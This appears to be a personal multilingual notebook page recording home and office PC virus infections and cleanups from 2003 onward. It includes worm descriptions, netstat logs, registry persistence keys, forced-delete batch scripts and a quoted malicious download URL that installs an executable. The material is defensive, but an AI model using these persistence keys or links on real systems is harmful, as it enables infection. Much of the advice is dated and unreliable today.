home / virus (navigation links) The best attacks are when the code executes as the page loads,
rather than having an attacker click on a link,
so pay close attention to OnLoad() events.

C 2k4 m | X 2k4 s | J 2k4 s | J 2k4 d | S 2k5 g | S 2k7 f | M 2k7 m | X 2k7 n | S 2k7 n | S 2k8 f | S 2k8 m | CMI 2k9 a | Uri i Esther 2k15 a | Arcadi Nov 2015 | Io Nov 2016 | Sin 201701 | no https Registre | covid-19 | venda en xarxa | Dubtes | Lectura | Links | End

Viruses = "verí" (llatí)

go 2 top
Amunt! Top Amunt!
Best free malware remove tools

20180131 :

  1. MalwareBytes Anti-Malware
  2. Bitdefender Antivirus
  3. Adaware Antivirus Free
  4. Emsisoft Emergency Kit
  5. SuperAntiSpyware

2022


Consells

El meu resum per en Cirx (20200604)

4 consells :

Mes consells ( 2 move ! )

En Pep diu : Jo faig servir l'avast com a antivirus, que és gratuït per a usuaris domèstics: I com anti-spyware faig servir l'SpyBot.


PE_NIMDA.A-O

This is a fast-spreading Internet worm and file infector in pure and original form. It arrives as an embedded attachment, README.EXE file, in an email that has an empty message body and, usually, an empty subject field. It does not require the email receiver to open the attachment for it to execute. It uses a known vulnerability in Internet Explorer-based email clients to execute the file attachment automatically. This is also known as Automatic Execution of Embedded MIME type.
The infected email contains the executable attachment registered as content-type of audio/x-wav so that when recipients view the infected email, the default application associated with audio files is opened. This is usually the Windows Media Player. The embedded EXE file cannot be viewed in Microsoft Outlook.

Few dangerous pages


Març 2003 : en Jordi té un virus

Els síntomes son :

Ha rebut un missatge dient que enviaba correus amb el virus w32.klez@mm
Veure qui es

Setembre 2004 : en Jordi té el Sasser

From here :

Microsoft Windows contains a vulnerability that can allow an attacker to execute arbitrary code.
The vulnerability is due to a lack of bounds checking on messages
submitted to the Local Security Authority Subsystem Service (LSASS) service.
An attacker can supply a long argument using the LSASRV.DLL function DsRoleUpgradeDownlevelServer()
to create a carefully constructed message and cause an overflow,
which can result in arbitrary code execution.

Keyword(s): Sasser, Cycle, Korgo, Bobax

Fix : KB 835732 from here (04-011)

Dec-2004 : el Sebas el té al XP ... uSoft says to install security update KB835732, [2.647 KB] from here
Removal tool [KB841720] is here [114 KB]


En Sebas té un virus : Octubre 2003

Amb la conexió commutada a Internet, normalment es reben deu vegades mes dades que les que s'envien. Al P4, des Octubre del 2003, vaig notar que s'enviaben mes dades que se'n rebien. Mirant una mica millor, vaig veure que hi havia un fluxe constant de uns 6.000 bytes per segon de sortida, reflectits als comptadors de la icona de la conexió, sense que jo estigués teclejant res.

Fent servir TCPview veig ( from SysInternals, as RegMon )


+++ start of NETSTAT -AN +++
--- Protocol --- Local IP --------- Remote IP ---------- State ---
  TCP    194.224.211.135:1666   194.224.75.25:135      TIME_WAIT
  TCP    194.224.211.135:1708   194.224.93.5:135       TIME_WAIT
  TCP    194.224.211.135:1715   194.224.93.35:135      TIME_WAIT
  TCP    194.224.211.135:1716   194.224.93.36:135      TIME_WAIT
  TCP    194.224.211.135:1719   194.224.94.2:135       TIME_WAIT
  TCP    194.224.211.135:1720   194.224.94.5:135       TIME_WAIT
  TCP    194.224.211.135:1721   194.224.94.6:135       TIME_WAIT
  TCP    194.224.211.135:1723   194.224.94.17:135      TIME_WAIT
  TCP    194.224.211.135:1724   194.224.94.31:135      TIME_WAIT
  TCP    194.224.211.135:1726   194.224.94.37:135      TIME_WAIT
  TCP    194.224.211.135:1727   194.224.94.38:135      TIME_WAIT
  TCP    194.224.211.135:1728   194.224.94.39:135      TIME_WAIT
  TCP    194.224.211.135:1729   194.224.94.40:135      TIME_WAIT
  TCP    194.224.211.135:1730   194.224.94.41:135      TIME_WAIT
  TCP    194.224.211.135:1735   194.224.94.46:135      TIME_WAIT
  TCP    194.224.211.135:1736   194.224.94.47:135      TIME_WAIT
  TCP    194.224.211.135:1737   194.224.94.48:135      TIME_WAIT
  TCP    194.224.211.135:1738   194.224.94.49:135      TIME_WAIT
  TCP    194.224.211.135:1739   194.224.94.50:135      TIME_WAIT
  TCP    194.224.211.135:1740   194.224.94.51:135      TIME_WAIT
  TCP    194.224.211.135:1741   194.224.94.53:135      TIME_WAIT
  TCP    194.224.211.135:1742   194.224.94.54:135      TIME_WAIT
  TCP    194.224.211.135:1743   194.224.94.55:135      TIME_WAIT
  TCP    194.224.211.135:1744   194.224.94.56:135      TIME_WAIT
  TCP    194.224.211.135:1745   194.224.94.57:135      TIME_WAIT
  TCP    194.224.211.135:1746   194.224.94.58:135      TIME_WAIT
  TCP    194.224.211.135:1747   194.224.94.59:135      TIME_WAIT
  TCP    194.224.211.135:1883   194.224.125.14:135     TIME_WAIT
  TCP    194.224.211.135:1898   194.224.126.142:135    TIME_WAIT
  TCP    194.224.211.135:1964   194.224.132.41:135     TIME_WAIT
  TCP    194.224.211.135:2015   194.224.135.1:135      TIME_WAIT
  TCP    194.224.211.135:2017   194.224.135.3:135      SYN_SENT
  TCP    194.224.211.135:2018   194.224.136.8:135      SYN_SENT
  TCP    194.224.211.135:2019   194.224.136.40:135     SYN_SENT
  TCP    194.224.211.135:2020   194.224.136.41:135     SYN_SENT
--- end of NETSTAT -AN ---

A Google diuen que

 Yes, a virus; most likely some Blaster variant.

Read Symantec about W32.Blaster.Worm : W32.Blaster.Worm exploits the DCOM RPC vulnerability, as described in uS Security Bulletin MS03-026. This worm attempts to download the MSBLAST.EXE file to the %WinDir%\system32 directory and then execute it.
And uSoft.

Mirant "Task Manager" abans i després es veu que apareix SVCHOST.EXE :

 atiptaxx.exe
 carpserv.exe
 CSRSS.EXE
 DLLHOST.EXE
 explorer.exe
 imonnt.exe
 imontray.exe
 internat.exe
 LSASS.EXE
 mstast.exe
 NTVDM.EXE
 regsvc.exe
 SERVICES.EXE
 SMSS.EXE
 SMTray.exe
 spoolsv.exe
 svchost.exe
 svchost.exe
 svchost.exe
 System
 System Idle Process  
 taskmgr.exe
 WINLOGON.EXE
 WinMgmt.exe
 WlanMonitor.exe

Buscant per tot el disc, descobreixo un punt interessant :

D:\>dir svchost.exe /s

 Volume in drive D is W2K
 Volume Serial Number is E82F-148F

 Directory of D:\WINNT\system32

06/12/1999  14:00                7.952 svchost.exe
               1 File(s)          7.952 bytes

 Directory of D:\WINNT\system32\dllcache

06/12/1999  14:00                7.952 svchost.exe
               1 File(s)          7.952 bytes

 Directory of D:\WINNT\system32\wins

03/09/2003  23:43               19.728 SVCHOST.EXE
               1 File(s)         19.728 bytes

     Total Files Listed:
               3 File(s)         35.632 bytes
               0 Dir(s)     558.993.408 bytes free

I el "SVCHOST.EXE" del directori "WINS" s'identifica (mitjançant "STRINGS") com

"TCP/IP Trivial File Transfer Protocol"

El W2K WS porta (Start + Help + Index) "Network Monitor driver". S'instala com a "Protocol" de "Microsoft". Però ... cal un "Network Monitor"del W2K Server per veure les dades ...

"If you are running Windows'2000 Server,
you can use Network Monitor to display and analyze
the information you collect with the Network Monitor Driver."

Avui vaig a posar un FireWall : ZoneAlarm : zlsSetup_45_538.exe [4,8 MB] o zlsSetup_45_538_001.exe o zlsSetup_55_062_004.exe
From here : [4,8 MB] Thanks Ramon Milà
De seguida m'avisa que DLLHOST.EXE es el virus Welchia/Nachi, i efectivament tinc \WINS\DLLHOST.EXE i \WINS\SVCHOST.EXE

La millor explicació l'he trobat aquí.
Instala los siguientes servicios :

http://www.sophos.com/support/disinfection/nachia.html says :

W32/Nachi-A relies upon two vulnerabilities in Microsoft's software. Sophos recommends that users ensure their computers are patched against these vulnerabilities. The two patches have been available from Microsoft since March and July 2003 respectively.
For more information on the vulnerabilities and to download the patches please visit Microsoft's website at the following urls:

www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS03-007.asp

Conclusió : use a Firewall !


En Sebas té un SpyWare : fsg_4104.exe, Novembre 2003

En Ramón Milà em diu que es un Gator SpyWare.

Get SpyBot Search & Destroy ? [3,5 MB, free] *** do it ! ***
See PestPatrol elements : Key Loggers, RATs (Remote Administration Trojans), SpyWare, Trojans, Worms, etc.
Aqui diu A spyware installed with common application such as the file sharing software iMesh. This process should be removed to ensure your personal privacy.
Here is a Scanner + Remover


En Chicho té un Adware : msa64chk.dll, Març 2004

Best description. REGSVR32 /u msa64chk.dll and REGSVR32 /u msapasrc.dll + reboot

Corro el PestScan al T30 i trobo :


Virus al T30

2004

Starting May 3-rd 2004, in Portugal but in IBMs Intranet, my W2K crashes LSASS.EXE every 2-3 hours.
In "My PC"\HKLM\Software\Microsoft\Windows\CurrentVersion\Run comes up : c:\winnt\system32\THLNTSESS.EXE, that requests a way to Internet (Zone Alarm says). There was also a IIC21.EXE file in C:\Documents and Settings\SP87026\Local Settings\Temp

See F:\MISCOSAS\vir\2004May

Solució : install windows2000-kb835732-x86-enu.exe

T30 al 2005

09/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe has terminated unexpectedly with rc=128

URL - This issue may occur if there are incorrect references to shared folders

Mark

Symantec (13/09/2005) em troba c:\winnt\system32\FCMIXC.EXE i l'esborra. Diu que es w32.IRCBot ...

w32.IRCBot : When a vulnerable system is found, it uses a buffer overflow to write the worm file to that machine via a TFTP upload on port 8594. w32.IRCBot.B attempts to connect to the IRC server, itc.ourmoney.pp.ruz, using TCP port 31337.

14/09/2005 el T30 (sense ZoneAlarm 15 minuts) + Symantec em troba c:\winnt\system32\GECB.EXE i l'esborra. Diu que es w32.SpyBot.Worm ...


21/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe has terminated unexpectedly with rc=128


13/10/2005 el T30 (sense ZoneAlarm 15 minuts) repeteix "status code 128".


Crec que s'hauria de aplicar MS05-039 ... pero requereix SP4 !
Aquí diu el mateix [ MS05-039 - KB899588 ]
Sembla que es el virus Zotob


Els problemes d'en Xavi, Septembre 2004

Al Setembre 2004, en Xavi es desperta amb un PC "infectat" ...

Abans de formatejar el disc dur, s'ha de :


Els problemes d'en Josep, Septembre 2004

Al Setembre 2004, en Josep Montmany diu que té un DROPPER.DELF.DV dins el MSSYS.EXE sota XP.

Al registre hi ha un NWIZ.EXE ... (???)

Probar el "SysClean" de TREND ... URL and ReadMe


Els problemes d'en Jordi, Desembre 2004

Al Desembre 2004, en Jordi Espinal em diu que la Mireia te damunt l'escriptori unes icones que no es poden esborrar, cal no tenen "Propietats" ... Website Hosting, Bingo, Casino Online, Printer Cartridges, Card Games, Poker, Travel
Akí diuen :

The Trojan may register some of the retrieved files to load at Windows startup by adding entries into the registry such as these examples -

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 "thunkburn" = %path%\Owns This Vc.exe

 HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}
 "64535DBE" = 2C0411726CB7B446F792

 HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}\InprocServer32\
 "(Default)" = %path%\Drive bin.exe
 "ThreadingModel" = Apartment

 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"DeleteDefySendRoad" = %path%\Thunkfilm.exe
In one "nice" aspect, at least one of the downloaded files has an uninstall routine which can be accessed by the "Add/Remove Software" applet from the control panel -
     HKEY_CURRENT_USER\Software\Microsoft\Windows\
     CurrentVersion\Uninstall\64 slow user\
     "DisplayName" = Search Plugin
     "UninstallString" = %path%\Owns This Vc.exe -uninstall
Caused by Messenger Plus

Solució : http://windowsxp.mvps.org/toolbarcop.htm or http://lop.com/new_uninstall.exe [***]

O fer servir Start > Run > MSCONFIG
Look in the Startup tab ... Uncheck and Restart ...

Telefonica DNS's : 80.58.0.33 and 80.58.32.97


En Sebas té TEEKIDS.EXE, Gener 2005

Jo diria que esta associat al Opera : he estat navegant molta estona amb el Firefox, i res. En un moment donat, obro el Opera, i s'engega el "Shutdown". L'aturo, pero el tallafocs engantxa la sortida del teekids.exe, que està situat a c:\windows\system32 i al registre !

VsanVirus diu :

 Vulnerabilidad RPC/DCOM: MS03-026
y "filtrar con un cortafuegos los siguientes puertos : udp/135, udp/137, udp/138, tcp/135, tcp/445, tcp/593, tcp/69, udp/69".

Per un de similar, diu :
La falla en el componente LSASS (MS04-011), usada también por gusanos como Sasser, Cycle, Bobax, Korgo, etc., permite infectar equipos con Windows XP y 2000 sin el parche correspondiente instalado, - 835732 -, por el simple hecho de conectarse estos a Internet, no siendo necesaria la ejecución de ningún archivo o adjunto que involucre acción alguna por parte del usuario.
La segunda (MS03-026), es la misma falla de la que se aprovecha el Lovsan (Blaster) y otros. Utiliza el puerto TCP/135. La falla se produce por un desbordamiento de búfer en la interfase RPC (Remote Procedure Call) que permite la ejecución arbitraria de código. El parche existe desde julio de 2003. ( 03-039 : 824146 )
La tercera (MS03-001), cuyo parche está disponible desde enero de 2003, - 810833 -, es explotada a través del puerto TCP/445. La falla ocurre en el sistema localizador RPC (Remote Procedure Call).

 TEEKIDS.EXE - es el gusano
 ROOT32.EXE - troyano tipo backdoor

www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS04-011.mspx


Feb 2007, Airis (Nicolau) : W32/MSNVB-D worm

Today, I've catched (ZoneAlarm) ttt.exe, zap.exe, hide.exe, avconsol.exe trying to connect to 72.14.207.95

url

Files : (hidden ?)

<Windows>\Avconsol.exe <Windows>\Zap.exe <System>\Hide32.exe <System>\Ttt.exe

Registry : (HKCU!)

HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : WinService Contingut : <System>\Ttt.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : AVantivirus Contingut : <Windows>\Avconsol.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : System Contingut : <Windows>\Zap.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : Servicewin Contingut : <System>\Hide32.exe HKCU\Software\VB and VBA Program Settings\Form1\TextBox

Mar 2007, Marta Planell : Brontok

Nov 2007, Xavi : Trojan Mailskinner

Nov 2007, P4 : WAQ.EXE

Feb 2008, Nico

MATAR.CMD :

del c:\windows\system32\WMSNL.EXE del c:\windows\system\LSASS.EXE del c:\windows\*.zip del c:\windows\temp\*.TMP del c:\Documents And Settings\Arcadi\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Irina\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Nicolau\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Karme\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Sebastia\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q

Conclusió : hi havia 3 virus.

Solució : cCleaner

Trobo a c:\windows\temp un fitxer bloquejat : ZLT022fd.TMP ! És de ZoneAlarm, vsmon.exe ...

Al engegar, un CMD line fa quelcom ... (2 finestres)

Persegueixo el virus amb el Filemon dins el Startup. Vull saber qui escriu el fitxer a c:\windows\temp !

Després de que NAV ni Gmail es queixessin dels fitxers A1FF.TMP, he instalat KAV 7.0.1.325 i, curiosament, em demana de treure Zone Alarm ! De seguida troba el troyano CRYPTS.DLL, i l'esborra. I màgicament desapareix un WinLogon que escoltava a 127.0.0.1:1025 (TCPview).

REGMON.LOG, line 5613150: regedit.exe:3484 QueryValue HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\crypt\DLLName SUCCESS "crypts.dll"

Drops the following files in the Windows directory: scins.exe, winserv.exe, fierms.exe, and madopew.dll.

url

* %WINDIR%\SYSTEM32\crypts.dll (29,696 bytes)
The files are internally compressed with UPX packer. The downloader uses Winlogon notification packages as registered DLLs that the Winlogon process loads at startup.

url

Explicació del mecanisme : Winlogon Notification Packages

The filename CRYPTS.DLL was first seen on Sep 13 2007 in SPAIN.
The unsafe files using this name are associated with the malware group TROJAN.SOBAR
Added as a Winlogon Notification DLL to automatically load on system start up.

url

Troj/Agent-GJR Trojan

url

20080223 : Kaspersky segueix treballant :


Maig 2008, P4

Solució : posar AVG.

Se'm menja la conexió a Internet conectant el Explorer a 66.186.63.188:7000 = "CUSTOMER.VPLS.NET" El trec.

Lista de troyanos por puerto: port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold

Ccleaner, en engegar, també vol anar a 66.186.63.188 ...

Solució : posar Avast.

Ara el Microchoft Explorer es vol conectar a 67.198.204.18:1863 = "CUSTOMER.VPLS.NET" El filtro amb el ZoneAlarm.

sfc /scannow = verify that all protected files are intact

ShellExView = identifica dll's y procesos que corren en el shell (explorer.exe)

(remote, net scan) Symantec 9.0.5.1000, ki := 'symantec' !

El explorer.exe peta amb el missatge "setting up personalized settings for c:\recyclers\" Al disc "D:\" hi ha
D:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
i a dintre hi ha ISE32.exe de 14.336 bytes !

Solució : URL

@echo off title Malware Removal Tool ;) - By Smartgenius color 0a taskkill /f /im explorer.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 1 /f ping -n 2 0.0.0.0 > nul c: cd c:\ attrib -r -s -h RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013 del /f %windir%\Prefetch\ISE32.EXE-34CFE4CB.pf del /f %windir%\Prefetch\ISE32.EXE-273EA8B7.pf del /f %windir%\Prefetch\ISEE.EXE-05DD3401.pf D: cd d:\ attrib -r -s -h del /f autorun.inf RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013 explorer msg /w * Gracias por usar este soft exit

Cheers, SmartGenius !


Abril 2009, CMI has TWEXT.exe

Follow these steps :

  1. Deshabilitar restauración del sistema

    Windows XP

    1. En el panel de Inicio pulse sobre "Mi PC"
    2. Haga clic en "Ver información del sistema"
    3. Seleccione la etiqueta "Restaurar sistema"
    4. Marque la casilla "Desactivar Restaurar sistema en todas las unidades" y pulse en "Aplicar".
    5. El sistema le preguntará si está seguro de querer deshabilitarlo. Confírmelo pulsando en SÍ.
    6. La opción que muestra el estado de los discos en la ventana "Configuración de la unidad" aparecerá deshabilitada (todo gris). Pulse en el botón Aceptar.

  2. Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos.

    Windows Vista/XP/2000.

    Presione la tecla F8 después de los mensajes de autodiagnóstico (POST) de la placa base. Dependiendo de la configuración puede que aparezca el mensaje "presione F8 para menú de inicio" durante una pausa de 2 segundos. En caso contrario, presione F8 repetidadmente mientras arranca el PC hasta que aparezca el menú de inicio, y elija "Modo seguro" o "Modo a prueba de fallos".

  3. borrar c:\windows\system32\twext.exe

url

Use autoruns.exe.


Desembre 2009, TCS has A0060612.exeT.exe

taskkill /f /im explorer.exe attrib -h -r -s S-1-5-21-1482476501-1644491937-682003330-1013 del S-1-5-21-1482476501-1644491937-682003330-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-AAX5-90401C608512}\ StubPath = "C:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise.exe"

Novembre 2010, Nicolau has cleansweep.exe

Double accent virus (Notepad, Firefox) :

h:\cleansweep.exe\cleansweep.exe

Març 2011, TCS@Dipu has PINK SLIP BOT

Pending to investigate ...


Març 2011, SAG T400 goes Stand By

Installing all updates ...

"Updates could not be installed" :
c:\WINDOWS\system32\CatRoot2\edb.log -> delete EDB.LOG and/or rename CatRoot2 folder.
c:\windows\Windowsupdate.log ;


Març 2011, K#1
W32.downadup VKPN[1].JPG @ c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files c:\windows\system32\X Solució : MS08-067 = KB958644 ;

Abril 2012, Angel te un Ukash

El archivo malware se llama mahmud.exe y se instala en

C:\Documents and Settings\Nombre de usuario\AppData\Roaming\

Regedit : locate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Find the registry key named Shell. Should be something like C:\Documents and Settings\username\desktop\VIRUS INFO.exe, located after "Explorer.exe"

En engegar la maquina, un RUNDLL32 activa c:\Documents and Settings\RAFI\Local Settings\temp\WPBT0.DLL


Maig 2012, Lourdes i net.exe

Symptoms:

Solucio :

Uninstall Norton Ghost with the Norton Removal Tool.


RV has Google Redirect (20120213)

CMI has "Trojan.ADH.2" (20141019)

Could not open this URL


MRJ has "gogorithm" (20141021)

CMI te "Crypto Locker" (20150315)

Fitxers amb extensio ".encrypted" i instruccions de pagament. Comprar using TOR


Lourdes te "Deal4Real" i/o "Lucky Shopper" (20150407)

Els enllaços son verds i inclou texte propi abans dels resultats de Google.

Reinstalo Firefox i Chrome.


Lourdes te "OnlineLowDeals" (20150507)

guide


Uri i Esther, Novembre de 2015

Install AdBlock (chrome), Click & Clean, and AVG "Protection FREE" (not the "PRO", which is a trial)

Can use


Amunt! Top Amunt!
Arcadi - converteix Folders en EXEs

After inserting a USB pen into an infected computer, all the folders are converted to a EXE that does not run. In fact, the folders are hidden, and the EXE's are fake, all with the same length. The worm is known as W32.SillyFDC

Details :

Windows Defender troba :

MBAM troba

Solució :

  1. make all files visible - E:\> attrib -h -a -s -r *.* /s /d
  2. delete EXE's withe the same name as () folders
  3. set AutoRun to OFF
Autoruns

To permanently prevent threats from using the AutoRun feature the following options are available:

Eines

Io Nov 2016 : virus a la tarja SD

En copiar els fitxers a PC, Symantec troba "Dcfly.exe"


2017Gener Sin - li intenten instalar SupremoControl per telefon

eina


Amunt! Top Amunt!
20170310 - Lourdes - Firefox no se pudo iniciar correctamente 0xc000007b

Buscar MSVCR100.DLL y MSVCP100.DLL

Baixa de nou : Microsoft Visual C++ 2010 Redistributable Package (x86)

url

Bona sequencia de neteja !


Amunt! Top Amunt!
Lourdes : Chrome Search Manager extension

Large version, as malware, but basically ...

Reset Chrome back to its initial settings :

  1. Chrome Settings
  2. Advanced Settings
  3. Reset Settings

Amunt! Top Amunt!
Joaquim Travesset - TheFastPush.com

Fer :

  1. al Chrome, posar chrome://settings/content/notifications i picar ENTER
  2. sota "Allow", borrar les URLs sospitoses picant als "3 punts" que hi ha a la dreta i escollint "Delete"

url


Lourdes no poc accedir HTTPS

Chrome i Firefox diuen :

Problemes que trobo :


Registre

Vigilar :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\ HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\Shell

Use AutoRuns


Amunt! Top Amunt!
Explorer.exe

Delete MSN Gaming Zone

El directori c:\Program Files\MSN Gaming Zone\Windows es re-omple màgicament després de esborrar-lo !

MS has hidden it very well, but it's there. Go to Add/Remove Programs, select Add/Remove Windows Components on the left, select Accessories and Utilities (don't uncheck it) and click Details... Then select Games (don't uncheck it) and again click Details... Uncheck Internet Games, then click OK, OK, OK, etc. Magically, all those evil MSN games are gone.

url

Encara no puc esborrar el directori c:\P F\MSN Gaming Zone\windows\ Owned by : ?

Com s'esborra \xerox\nwwia ?

Com nassos s'esborra la carpeta c:\Archivos de Programa\xerox\nwwia ?

Rename all sfcfiles.dll into sfcfilesold.dll and reboot.


Com es fà això ?

url

W32.Kabel.B@mm [...] opens a back door on TCP port 58641 allowing a remote attacker to gain unauthorised access to the compromised computer.

Solució : Turn off and remove unneeded services.


Antiparásitos Ciberp@is [23/Sept/2004]

URL's :

Antiparásitos The Scream !

URL (descr), pack.

BHOList - A front end for Tony Kleins BHO collection. Download the latest lists.
CWShredder - A tool for the removal of CoolWebSearch and it's variants.
EndItAll 2 - A modified three finger salute!
HijackThis! - Lists running processes, startups and more.
Startup CPL XP - A very useful full featured startup logger.
StartupList - Displays a list of all startup entries in Notepad.
BHO Demon - Lists all installed BHO's.
LSP-FIX - Winsock 2 repair utility.
Process Viewer - Allows you to view what's actually running.
Process Explorer XP-NT - Provides detailed information about running processes.
Spybot S&D 1.3 - Anti spyware utility.
AboutBuster 1.26 - Removes about:blank hijacks.

Registro limpio

Tras instalar W2K, el Registro contiene :

     HKLM -> Software -> Microsoft -> Windows -> Current Version -> Run

     Synchronization Manager       mobsync.exe /logon
Clean it from time to time !

Scan On Line


Free downloads

Firewall Zone Alarm v 4.5 [5,9 MB]

Spy Hunter.

SpyWare removal or Ad-Aware

SpyBot. How to Enable/Disable it


Debian and SucKIT

Just run:
   # ls -li /sbin/init /sbin/telinit

 Here is the output on a normal machine:
   304579 -rwxr-xr-x   1 root    root    26920 Mar 14  2002 /sbin/init*
   304587 lrwxrwxrwx   1 root    root        4 Dec  2 13:18 /sbin/telinit -> init*

 Here is the output on a compromised machine:
    85133 -rwxr-xr-x   1 root    root    25636 Mar 26 20:03 /sbin/init
    85133 -rwxr-xr-x   1 root    root    25636 Mar 26 20:03 /sbin/telinit

 In the second case, telinit is a real file (not a symlink) and its time is the time
 of the rootkit installation. Note also the incorrect information:
 both files have the same inode number but a reference count of one;
 this comes from the kernel module hiding the real information.

Fixed in Linux 2.4.23 - SuSE 8.2 is 2.4.20 !


Neteja PC's de casa

Mitjaçant T42 & Symantec

PC name Deit
P4 12/07/2008
RAP 02/08/2008
HP Arcadi  
HP Kayak  

Epidemies

2003 Best :

  • SQL Slammer - el más eficaz
  • Bugbear.B - el más dañino
  • Klez.I - el más persistente
  • Gibe.C - el más ingenioso
  • Nachi.A - el más ladino
  • Ganda.A - el más oportunista
  • Sobiq.F - el más rápide

2004 Best :

  • Downloader.GK trojan
  • Netsky.P
  • Sasser.ftp
  • Gaobot.gen
  • Mhtredir.gen
  • Netsky.D
  • Downloader.L
  • Qhost.gen
  • Netsky.B
  • StartPage.FH

Agost 2005 [La Vanguardia, 18/08/2005]

  • ZotoB
  • Rbot
  • Bozori

Noticies

Según informa 'The New York Times' Un virus bloquea empresas, instituciones y medios de comunicación en EE.UU. Atacó principalmente los sistemas que operan con Windows 2000

LVD - 17/08/2005 - 09.45 horas

Washington. (EFE).- Un virus informático del tipo gusano atacó los sistemas que operan con Windows 2000 en empresas, instituciones y medios de comunicación de Estados Unidos, entre ellos las cadenas de televisión CNN y ABC y el diario "The New York Times".
Los problemas en la CNN y en el diario neoyorquino se resolvieron en 90 minutos y sus operaciones no se vieron afectadas, según fuentes oficiales.
El virus también apagó ordenadores en el Congreso, que está en receso de verano, y causó problemas en los de la agencia de noticias Associated Press (AP) y de la industria de maquinaria agrícola Caterpillar, en el estado de Illinois.
Sin embargo, una fuente de la Oficina Federal de Investigaciones (FBI) manifestó que los problemas que han surgido en los sistemas informáticos no parecen ser parte de algún ataque generalizado.
CNN, que dijo que la infección se ha extendido a Alemania y algunos países asiáticos, informó de que sus ordenadores comenzaron a fallar tanto en Nueva York como en Atlanta a partir de las 23.00 GMT, mientras que las dificultades de ABC fueron advertidas poco después de las 17.30 GMT.
La cadena de televisión por cable citó las declaraciones de un experto que manifestó que el ataque parece ser obra de un gusano informático llamado "rbot.ebq".
Añadió que sus principales síntomas son una repetida conexión y desconexión del ordenador.
Lysa Myers, de la firma de seguridad informática McAfee, señaló que el gusano aprovecha un punto vulnerable del sistema de Microsoft.
Por su parte, Johannes Ullrich, director de una firma de seguridad informática con sede en Jacksonville (Florida), añadió que el origen del problema puede ser el virus "zotob", del tipo "gusano", cuya existencia fue denunciada el lunes.
Según dijo Ullrich a la CNN, este gusano se conecta a un servidor para pedir instrucciones y después recorre las redes con la intención de infectarlas.
Indicó que, aunque afecta principalmente al sistema Windows 2000, también puede dañar o interrumpir las funciones de algunas versiones anteriores de Microsoft XP.
La existencia del virus "zotob" fue denunciada el lunes en Seattle por el gigante informático Microsoft Corp, que indicó que su blanco son los fallos detectados en el sistema de Windows.
La empresa de seguridad informática Trend Micro Inc. indicó que ese "gusano" dirige sus ataques a los sistemas Windows 95, 98, ME, NE, 2000 y las plataformas XP.
Según David Perry, experto de Trend Micro, el gusano informático puede ser una derivación del "zotob" y anticipó que los daos serán "menores" y que los expertos lograrán neutralizar al "gusano". La semana pasada, Microsoft suministró "parches" para resolver los problemas de seguridad del sistema.

MS05-039

Un virus deja a los medios de EE. UU. sin ordenadores

LA VANGUARDIA - 18/08/2005 Agencias. BARCELONA

Los principales medios de comunicación estadounidenses han tenido que desempolvar sus viejas máquinas de escribir debido a un virus informático que ha puesto en jaque todo el sistema de ordenadores. Un gusano se coló en el sistema informático de empresas periodísticas tan importantes como The New York Times, ABC y CNN, las cuales tuvieron que recurrir a la alternativa de la máquina para poder proseguir con su trabajo. Los expertos creen que es una consecuencia de las guerras internas que hay en EE. UU entre bandas piratas.
El problema comenzó a detectarse el pasado martes cuando varias cadenas de televisión y diarios vieron como su sistema informático sufría graves alteraciones. Entre los gusanos informáticos parece encontrarse el Zotob, que comenzó su ronda por internet el fin de semana, y nuevas variantes de Rbot y Bozori. Aunque los entendidos no saben de dónde proceden los virus, la firma de seguridad F-Segure, experta en el tema, plantea la hipótesis de que el ataque es el resultado de la competición entre bandas rivales de piratas informáticos.
"Parece que hay tres diferentes bandas de diseñadores de virus que lanzan nuevos gusanos a una velocidad alarmante, como si estuvieran compitiendo para hacerse con el mayor número posible de máquinas infectadas", manifestaron desde F-Secure.
Microsoft quitó hierro al asunto y dijo que, a pesar de los problemas de organización en los medios de comunicación, es improbable que los códigos malignos causen tanto caos como el que produjeron virus como MyDoom o Sobig.

MS05-039

url

The "WORM_RBOT.CBQ" worm has been detected wintbp.exe is the host of the worm.

url

\\vir\10.1.1.115.639.pdf


Behavior blockers

Behavior blockers


Felicitació de Nadal 2007

Arriba una felicitació que per llegir has de picar aqui.

... que et porta a http://get.willadd.com/get.php que posarà al teu PC gogocard.gif.exe !


